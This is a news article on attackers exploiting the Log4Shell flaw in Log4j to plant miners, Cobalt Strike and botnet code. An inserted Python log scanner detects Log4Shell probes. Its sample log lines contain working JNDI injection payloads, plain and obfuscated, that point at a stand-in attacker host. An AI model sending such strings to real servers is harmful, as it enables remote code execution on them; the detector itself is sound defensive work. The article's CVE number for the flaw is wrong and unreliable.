Saturday, January 28, 2023

Apache Log4j’s Log4Shell flaw actively exploited by hackers

Hackers are actively attacking servers affected by the "Log4Shell" vulnerability recently identified in Log4j. Their aim is to install cryptocurrency miners via Cobalt Strike and to enlist the devices in a botnet. Telemetry shows that the flaw was being exploited 9 days before it was publicly disclosed on December 9.

The security company Netlab commented on the case. Similar threats, such as Mirai and Muhstik (Tsunami), are targeting vulnerable systems, it says. Muhstik had already exploited a critical security flaw in Atlassian Confluence in early September. These were DDoS (distributed denial of service) attacks intended to render infected systems unusable.

A threat since early December

The Redmond-based tech giant says it has detected a plethora of malicious activity, including the installation of Cobalt Strike for credential theft, the deployment of cryptocurrency miners and the exfiltration of data from compromised machines.

"The first Log4j exploitation report dates from December 1 at 04:36 UTC."

Matthew Prince, CEO of Cloudflare

This suggests that the flaw was already being exploited at least 9 days before its public disclosure. According to the Cisco Talos Intelligence Group report, there had already been hacker activity from December 2.

How has the Log4Shell flaw been exploited?

Most of the attacks observed by Microsoft so far are attempts to scan for vulnerable systems. However, once an attacker controls an application, there are a myriad of goals that can be achieved.

Tracked as CVE-2021-22448 (CVSS score: 10.0), the flaw allows remote code execution in Log4j. All the attacker had to do was send strings containing the malicious code, which are then logged by Log4j version 2.0 or later.

Propagation is all the easier because Apache Log4j, an open-source Java library, is widely used in enterprises to record events and messages generated by applications. This lets attackers load code from a remote domain onto a sensitive server and take control of it. Once in control, they are capable of causing the worst havoc.
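As an added example, not from the article, here is a small Python log-scanning routine from the defender's side: it undoes the nested-lookup obfuscation commonly seen in Log4Shell probes and flags web-server log lines that would trigger a JNDI lookup when logged. The log lines, hosts and paths are constructed placeholders.

```python
import re

# Innermost Log4j lookup: ${...} with no nested braces inside.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def _reduce(match):
    """Evaluate one innermost lookup the way Log4j's substitutor would,
    for the lookup types attackers use to hide the 'jndi' prefix."""
    body = match.group(1)
    if ":-" in body:                          # ${env:X:-j} or ${::-j} -> default "j"
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):     # ${lower:J} -> "j"
        return body[6:].lower()
    if body.lower().startswith("upper:"):     # ${upper:j} -> "J"
        return body[6:].upper()
    return match.group(0)                     # anything else (incl. jndi) stays


def normalize(text, max_rounds=8):
    """Repeatedly collapse nested lookups until the string stops changing."""
    for _ in range(max_rounds):
        reduced = INNER_LOOKUP.sub(_reduce, text)
        if reduced == text:
            break
        text = reduced
    return text


def is_log4shell_probe(line):
    """True if the line carries a JNDI lookup once obfuscation is undone."""
    return "${jndi:" in normalize(line).lower()


def scan(lines):
    """Return only the log lines that look like Log4Shell probes."""
    return [line for line in lines if is_log4shell_probe(line)]


# Constructed web-server access log lines; hosts and paths are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:12:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:12:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:12:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:12:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:03:12:15 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT:", hit)
```

The benign `${date:yyyy}` line is not flagged, which keeps the check from alerting on every `${` a log line happens to contain.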

There is no specific target for this vulnerability. Hackers take a "spray-and-pray" approach to wreak havoc. Incidents like these illustrate how a single flaw, embedded in a great deal of software, can cause a chain reaction. Always remember: malware and other computer attacks start with a single line of text.


Source From: Fredzone
